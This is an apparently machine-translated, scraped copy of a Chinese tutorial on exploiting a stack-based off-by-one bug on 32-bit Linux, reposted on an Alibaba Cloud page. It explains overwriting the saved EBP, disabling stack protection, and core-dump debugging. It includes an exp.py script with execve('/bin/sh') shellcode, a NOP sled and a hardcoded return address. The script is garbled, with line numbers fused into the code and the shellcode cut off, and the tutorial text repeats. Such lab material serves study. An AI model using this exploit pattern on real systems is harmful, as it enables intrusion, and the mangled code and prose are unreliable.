Three off-by-one vulnerabilities of Linux (x86) exploit series (stack based)

Source: Internet
Author: User

Off-by-one Vulnerability (stack based)

Original address: https://bbs.pediy.com/thread-216954.htm

What is off by one?

Copying a source string to a destination buffer may result in off by one

1, the source string length equals the target buffer length.

When the source string length equals the target buffer length, a single null byte is copied over the target buffer. Because the target buffer is located in the stack, a single null byte can overwrite the least significant bit (LSB) of the caller's EBP stored in the stack, which can lead to arbitrary code execution.

As always, full definition, let's take a look at the bug code off by one!

Too lazy to paste, or read the original bar, only to explain the part.

This full-text explanation is particularly clear, I only say the pit I encountered during the commissioning process.

The first is the core file debug, the Compile optiongcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o vuln vuln.c

Please note that the-G option is not used, then it is not debug mode, there is no debug mode, debugging when there is no way to break down the source, so can only use the core file.

Using the core file debugging method, the author also gave out, but I ran Python exp.py, but there is no core file. After querying the data, using the ulimit-c command query, found that the value is 0, originally the system default (?) Do not allow creation of core files, modify restrictions, modify with Ulimit-c 1000

After the modification, the core file is generated normally.

There is also a comparison pit point is, gdb debug buf address and really run release version of the BUF address is not the same, there are changes in the offset, need special attention.

Or the usual, share the exp.py file I've successfully debugged.

1 #exp.py2 #!/usr/bin/env python3 Importstruct4  fromSubprocessImportPager5 6 #Spawn a shell.7 #Execve (/bin/sh) Size-28 bytes.8SCODE ="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\$9 TenRET_ADDR = 0xbffff426 One  A #endianess Conversion - defConv (num): -  returnStruct.pack ("<i", num)#Turn Address + NOP ' s + Shellcode + j$ theBUF ="A"* 68 -BUF + =Conv (ret_addr) -BUF + ="\x90"* 30 -BUF + =SCODE +BUF + ="A"* 126 -  + Print "Calling vulnerable program" ACall (["./vuln", buf])

Off-by-one Vulnerability (stack based)

Virtual machine Installation: Ubuntu 12.04 (x86)

What is off by one?

Copying a source string to a destination buffer may result in off by one

1, the source string length equals the target buffer length.

When the source string length equals the target buffer length, a single null byte is copied over the target buffer. Because the target buffer is located in the stack, a single null byte can overwrite the least significant bit (LSB) of the caller's EBP stored in the stack, which can lead to arbitrary code execution.

As always, full definition, let's take a look at the bug code off by one!

Vulnerability Code:

Three off-by-one vulnerabilities of Linux (x86) exploit series (stack based)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.